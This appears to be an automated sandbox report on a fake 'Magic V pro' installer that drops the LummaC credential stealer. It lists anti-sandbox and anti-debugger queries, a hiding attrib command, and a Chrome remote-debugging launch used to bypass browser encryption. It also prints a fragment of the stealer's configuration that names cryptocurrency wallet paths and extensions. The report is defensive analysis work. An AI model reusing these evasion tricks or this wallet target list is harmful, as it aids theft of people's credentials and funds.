Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000006.00000002.1353231883.0000000000912000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="PETOOLS.EXE");
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000006.00000002.1353231883.0000000000912000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="SYSANALYZER.EXE");
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000006.00000002.1353231883.0000000000912000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="HOOKEXPLORER.EXE");
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000006.00000002.1353231883.0000000000912000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="PROC_ANALYZER.EXE");
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000006.00000002.1353231883.0000000000912000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="DUMPCAP.EXE");
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000006.00000002.1353231883.0000000000912000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="FIDDLER.EXE");
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000006.00000002.1353231883.0000000000912000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="PROCESSHACKER.EXE");
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000006.00000002.1353231883.0000000000912000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="SNIFF_HIT.EXE");
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000006.00000002.1353231883.0000000000912000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="FILEMON.EXE");
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000006.00000002.1353231883.0000000000912000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="WIRESHARK.EXE");
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000006.00000002.1353231883.0000000000912000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="OLLYDBG.EXE");
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000006.00000002.1353231883.0000000000912000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="X64DBG.EXE");
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000006.00000002.1353231883.0000000000912000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="IDAQ.EXE");
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000006.00000002.1353231883.0000000000912000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="WINDBG.EXE");
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000006.00000002.1353231883.0000000000912000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="AUTORUNS.EXE");
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000006.00000002.1353231883.0000000000912000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="XENSERVICE.EXE");
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000006.00000002.1353231883.0000000000912000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="IMPORTREC.EXE");
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000006.00000002.1353231883.0000000000912000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="PROCMON.EXE");
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000006.00000002.1353231883.0000000000912000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="REGMON.EXE");
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000006.00000002.1353231883.0000000000912000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Y(SELECT * FROM WIN32_PROCESS WHERE NAME="OLLYDBG.EXE");
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000006.00000002.1353231883.0000000000912000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="AUTORUNSC.EXE");

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe

Code function: 18_2_03FB69BB rdtsc

18_2_03FB69BB

Contains functionality to detect virtual machines (SLDT)

Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp

Code function: 8_2_008A34C4 sldt word ptr [eax]

8_2_008A34C4

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\conhost.exe

Window / User API: threadDelayed 958

Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-7UHOC.tmp\idp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-7UHOC.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\_isetup\_setup64.tmp	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe

API coverage: 6.4 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp TID: 1988	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe TID: 3492	Thread sleep time: -60000s >= -30000s			Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SEleCt * FrOm wIN32_CoMPuTeRsySteM

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00DA6CE2 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,		11_2_00DA6CE2
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_03FB3F02 lstrcpyW,lstrcpyW,lstrcatW,FindFirstFileW,PathRemoveFileSpecW,lstrcatW,lstrcmpW,lstrcmpW,lstrcatW,CreateDirectoryW,lstrcatW,lstrcatW,lstrcatW,PathRemoveFileSpecW,PathRemoveFileSpecW,lstrcatW,PathRemoveFileSpecW,PathRemoveFileSpecW,lstrcatW,lstrcatW,CopyFileExW,lstrcpyW,lstrcatW,lstrcpyW,lstrcatW,FindNextFileW,FindClose,		18_2_03FB3F02

Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe

Code function: 11_2_00DA7904 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,

11_2_00DA7904

Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe

Code function: 11_2_00DAA0D3 GetSystemInfo,

11_2_00DAA0D3

Source: taskshostw.exe, 00000012.00000003.2396086907.0000000000865000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWT
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000006.00000002.1353231883.0000000000912000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000008.00000003.1551506407.0000000000938000.00000004.00000020.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000008.00000003.1399164930.0000000000922000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000012.00000003.2396086907.0000000000865000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000008.00000003.1551506407.00000000008E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH
Source: taskshostw.exe, 00000012.00000002.3145828858.0000000000830000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh

Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe

Code function: 18_2_03FB69BB rdtsc

18_2_03FB69BB

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe

Code function: 18_2_00444660 LdrInitializeThunk,

18_2_00444660

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe

Code function: 11_2_00E28180 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,

11_2_00E28180

Contains functionality to read the PEB

Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_03FB2ADA mov edx, dword ptr fs:[00000030h]	18_2_03FB2ADA
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_03FB1227 mov edx, dword ptr fs:[00000030h]	18_2_03FB1227
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_03FB39C3 mov eax, dword ptr fs:[00000030h]	18_2_03FB39C3
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_03FB2720 mov ebx, dword ptr fs:[00000030h]	18_2_03FB2720
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_03FB65CC mov edx, dword ptr fs:[00000030h]	18_2_03FB65CC
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_03FC0D30 mov eax, dword ptr fs:[00000030h]	18_2_03FC0D30
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_03FC0D1D mov eax, dword ptr fs:[00000030h]	18_2_03FC0D1D

HIPS / PFW / Operating System Protection Evasion

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process created: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe "C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe" /verysilent /sp-	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe attrib +h +S "C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --remote-debugging-port=9222	Jump to behavior

Language, Device and Operating System Detection

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe

Code function: 11_2_00E458F0 cpuid

11_2_00E458F0

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe

Code function: 11_2_00DAAFFD GetSystemTimeAsFileTime,

11_2_00DAAFFD

Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe

Code function: 11_2_00E428D0 GetVersion,GetModuleHandleW,GetProcAddress,

11_2_00E428D0

Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: 18.3.taskshostw.exe.2990000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.taskshostw.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.3.taskshostw.exe.2990000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.3144361654.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1631758552.0000000002990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Source: taskshostw.exe, 00000012.00000002.3147101284.0000000000891000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum-LTC\wallets
Source: taskshostw.exe, 00000012.00000003.2396086907.000000000088F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: taskshostw.exe, 00000012.00000002.3147101284.0000000000891000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/JAXX New Version
Source: taskshostw.exe, 00000012.00000002.3145828858.00000000007FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: taskshostw.exe, 00000012.00000003.2396086907.000000000088F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: taskshostw.exe, 00000012.00000002.3147560636.00000000008D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3d
Source: taskshostw.exe, 00000012.00000002.3147101284.00000000008A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binancel
Source: taskshostw.exe, 00000012.00000002.3147101284.000000000087F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: taskshostw.exe, 00000012.00000003.2396086907.000000000088F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: taskshostw.exe, 00000012.00000003.2396086907.00000000008C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: gbiamfdfmbikcdghidoadd","ez":"Byone"},{"en":"infeboajgfhgbjpjbeppbkgnabfdkdaf","ez":"OneKey"},{"en":"cihmoadaighcejopammfbmddcmdekcje","ez":"Leaf"},{"en":"bhhhlbepdkbapadjdnnojkbgioiodbic","ez":"Solflare"},{"en":"mkpegjkblkkefacfnmkajcjmabijhclg","ez":"Magic Eden"},{"en":"aflkmfhebedbjioipglgcbcmnbpgliof","ez":"Backpack"},{"en":"gaedmjdfmmahhbjefcbgaolhhanlaolb","ez":"Authy"},{"en":"oeljdldpnmdbchonielidgobddfffla","ez":"EOS Authenticator","ses":true},{"en":"ilgcnhelpchnceeipipijaljkblbcob","ez":"GAuth Authenticator","ses":true},{"en":"imloifkgjagghnncjkhggdhalmcnfklk","ez":"Trezor Password Manager"},{"en":"bfnaelmomeimhlpmgjnjophhpkkoljpa","ez":"Phantom"},{"en":"ppbibelpcjmhbdihakflkdcoccbgbkpo","ez":"UniSat"},{"en":"cpojfbodiccabbabgimdeohkkpjfpbnf","ez":"Rainbow"},{"en":"jiidiaalihmmhddjgbnbgdfflelocpak","ez":"Bitget Wallet"}],"mx":[{"en":"webextension@metamask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":[""],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":[""],"z":"Wallets/Ledger Live","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\atomic\\Local Storage\\leveldb","m":[""],"z":"Wallets/Atomic","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Armory","m":[".wallet"],"z":"Wallets/Armory","d":1,"fs":20971520},{"t":0,"p":"%localappdata%\\Coinomi\\Coinomi\\wallets","m":[""],"z":"Wallets/Coinomi","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Authy Desktop\\Local Storage\\leveldb","m":[""],"z":"Wallets/Authy Desktop","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Bitcoin\\wallets","m":[""],"z":"Wallets/Bitcoin core","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":[""],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":[""],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":[""],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":[""],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","m":[""],"z":"Wallets/Guarda","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\DashCore\\wallets","m":[".dat"],"z":"Wallets/DashCore","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\WalletWasabi\\Client\\Wallets","m":[""],"z":"Wallets/Wasabi","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Daedalus Mainnet\\wallets","m":["she.*.sqlite"],"z":"Wallets/Daedalus","d":0,"fs":20971520},{"t":1,"p":"%localappdata%\\Google\\Chrome\\User Data","z":"Chrome","f":"Google Chrome","n":"chrome.exe","l":"chrome.dll"},{"t":1,"p":"%localappdata%\\Google\\Chrome Beta\\User Data","z":"Chrome Beta","f":"Google Chrome Beta","n":"chrome.exe","l":"chro

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 00000012.00000003.2396086907.000000000088F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: taskshostw.exe PID: 2444, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --remote-debugging-port=9222

Yara detected LummaC Stealer

Source: Yara match	File source: 18.3.taskshostw.exe.2990000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.taskshostw.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.3.taskshostw.exe.2990000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.3144361654.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1631758552.0000000002990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	21 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Search Order Hijacking	1 DLL Search Order Hijacking	4 Obfuscated Files or Information	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	1 Create Account	1 Access Token Manipulation	2 Software Packing	Security Account Manager	47 System Information Discovery	SMB/Windows Admin Shares	2 Clipboard Data	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	11 Process Injection	1 DLL Side-Loading	NTDS	221 Security Software Discovery	Distributed Component Object Model	Input Capture	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Scheduled Task/Job	1 DLL Search Order Hijacking	LSA Secrets	3 Virtualization/Sandbox Evasion	SSH	Keylogging	15 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	1 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	3 Virtualization/Sandbox Evasion	Proc Filesystem	2 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
